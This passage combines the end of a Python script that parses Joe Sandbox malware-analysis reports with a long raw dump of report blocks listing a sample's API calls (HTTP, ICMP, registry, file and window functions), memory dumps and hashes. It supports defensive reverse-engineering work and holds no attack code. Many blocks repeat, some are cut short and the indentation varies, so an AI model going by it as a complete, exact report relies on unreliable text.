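# Excerpt of the report blocks above, abbreviated (most Associated lines dropped).
SAMPLE = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
• API String ID: 3705125965-3916222277
• Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
• Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \\VH
• API String ID: 1682464887-234962358
• Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
"""
# Constructed repeat of the last block (same Opcode ID) so dedupe has work to do.
SAMPLE += SAMPLE[SAMPLE.rindex("APIs\n"):]

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    print(len(recs), "functions parsed,", len(dedupe(recs)), "unique")
    for opcode_id, chain in network_functions(dedupe(recs)):
        print(opcode_id, "->", " -> ".join(chain))
```

Feed it the text of a whole report section (the "Download File" suffixes and the indentation are stripped during parsing) and the Opcode IDs of the flagged functions give you stable names for the functions to carry into IDA via the snapshot file named in each block.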
APIs
• GetMenuItemInfoW.USER32 ref: 0045FAC4
• DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
• DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
• Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
• GetWindowLongW.USER32(?,000000F0), ref: 0045087D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
• Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
APIs
• DestroyWindow.USER32(00000000), ref: 00450A2F
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: DestroyWindow
• String ID: msctls_updown32
• API String ID: 3375834691-2298589950
• Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
• Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
• Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
• Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memmove
• String ID: $<
• API String ID: 4104443479-428540627
• Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
• Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
• Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
• Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
• Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
• Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
• Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
Strings
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D37E
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
Strings
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D55C
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
Strings
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
Strings
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromString.OLE32(?,00000000), ref: 00435236
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
Strings
Similarity
• API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
• String ID: crts
• API String ID: 943502515-3724388283
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
• SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
• SetErrorMode.KERNEL32(?), ref: 0045D35C
Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$LabelVolume
                                                                                                                                                    • String ID: \VH
                                                                                                                                                    • API String ID: 2006950084-234962358
                                                                                                                                                    • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                    • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                                    • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                    • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                                                    • DrawMenuBar.USER32 ref: 00449761
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 772068139-4108050209
                                                                                                                                                    • Opcode ID: 4412252fe0bb34e9c551b06fe095adc5aa4849453a321eb16ccca2d465028982
                                                                                                                                                    • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                                                    • Opcode Fuzzy Hash: 4412252fe0bb34e9c551b06fe095adc5aa4849453a321eb16ccca2d465028982
                                                                                                                                                    • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$_wcscpy
                                                                                                                                                    • String ID: 3, 3, 8, 1
                                                                                                                                                    • API String ID: 3469035223-357260408
                                                                                                                                                    • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                                    • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                                                                    • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                                    • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                    • API String ID: 2574300362-3530519716
                                                                                                                                                    • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                    • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                                                    • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                    • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                    • API String ID: 2574300362-275556492
                                                                                                                                                    • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                    • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                                                    • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                    • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                    • API String ID: 2574300362-58917771
                                                                                                                                                    • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                    • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                                                    • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                    • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
• VariantInit.OLEAUT32(?), ref: 0047950F
• SysAllocString.OLEAUT32(00000000), ref: 004795D8
• VariantCopy.OLEAUT32(?,?), ref: 0047960F
• VariantClear.OLEAUT32(?), ref: 00479650
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
• SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
• __itow.LIBCMT ref: 004699CD
  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
• SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
• __itow.LIBCMT ref: 00469A97
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
APIs
• GetWindowRect.USER32(?,?), ref: 00449A4A
• ScreenToClient.USER32(?,?), ref: 00449A80
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
• ClientToScreen.USER32(00000000,?), ref: 0044169A
• GetWindowRect.USER32(?,?), ref: 00441722
• PtInRect.USER32(?,?,?), ref: 00441734
• MessageBeep.USER32(00000000), ref: 004417AD
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
• __isleadbyte_l.LIBCMT ref: 004208A6
• MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
• MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
                                                                                                                                                    • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                                    • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                                                                    • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                                    • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
APIs
• GetParent.USER32(?), ref: 004503C8
• DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
• DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
• DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
